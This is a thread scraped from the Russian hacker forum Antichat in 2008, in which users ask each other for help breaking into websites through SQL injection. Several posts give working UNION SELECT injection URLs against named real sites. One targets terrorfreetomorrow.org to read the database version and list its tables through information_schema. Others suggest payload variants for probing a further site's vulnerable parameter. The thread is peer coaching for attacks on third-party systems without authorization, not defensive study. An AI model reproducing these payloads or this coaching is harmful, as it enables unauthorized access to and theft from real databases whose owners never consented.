Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
02.11.2008, 21:22
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217
Репутация:
2097
|
|
Там скорее всего mod_security стоит, в фильтры которого попадают передаваемые данные
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
|
|
|
03.11.2008, 13:43
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686
Репутация:
-25
|
|
Кто подскажет это чтоза cms http://audiovkontakte.ru/
И где её взять?
|
|
|
|
03.11.2008, 14:04
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
какая еще cms?
там одна или пару страничек и самописный скрипт парсинга ссылок с вк.
все
|
|
|
|
03.11.2008, 14:10
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686
Репутация:
-25
|
|
Сообщение от iddqd
какая еще cms?
там одна или пару страничек и самописный скрипт парсинга ссылок с вк.
все
А где такой рарс нарыть???
|
|
|
|
03.11.2008, 14:11
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
у Исиса купи
|
|
|
|
03.11.2008, 14:13
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079
Репутация:
90
|
|
Помогите расковырять инъекцию:
http://www.terrorfreetomorrow.org/articlenav.php?id=-1+union+select+1,2,3,4,version(),6
Последний раз редактировалось InFlame; 03.11.2008 в 14:24..
|
|
|
|
03.11.2008, 14:20
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686
Репутация:
-25
|
|
Сообщение от InFlame
Помогите расковырять инъекцию:
http://www.terrorfreetomorrow.org/articlenav.php?id=-1+union+select+1,2,3,4,version(),6
Вот тебе название таблиц
http://www.terrorfreetomorrow.org/articlenav.php?id=-1+union+select+1,2,3,4,table_name,6+from+informati on_schema.tables
А дальше уже сам ковыряй её!
|
|
|
|
04.11.2008, 17:00
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
Вобщем такая ситуация:
Есть сайт: http://www.xxx.com/news.php?type=16 (Выводит новость)
При запросе: http://www.xxx.com/news.php?type=17-1 (Выводдит ту же самую новость)
При запросе: http://www.xxx.com/news.php?type=17 (Выводдит "Новость не существует")
-------------------------------------------------------------
При запросе: http://www.xxxx.com/news.php?type=16+union+select+1,2,3,4,5/* (Выводдит "Новость не существует")
При запросе: http://www.xxxx.com/news.php?type=16+union+select+1,2,3,4/* (Выводдит новость с id 16)
При запросе: http://www.xxxx.com/news.php?type=16+union+select+1,version(),3,4/* (Выводдит новость с id 16)
Вобщем нет никаких ошибок( хотя SQL Inj присутствует ... что делать в такой ситуации ?
|
|
|
|
04.11.2008, 17:06
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
попробуй склеить union select с:
type=17'
type=-1
type=-1'
type=9999
|
|
|
|
04.11.2008, 17:07
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от geforse
что делать в такой ситуации ?
Читать статьи про скуль. 
А что по твоему он должен выводить?
http://www.xxxx.com/news.php?type= -16+union+select+1,2,3,4/*
Вот так попробуй
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
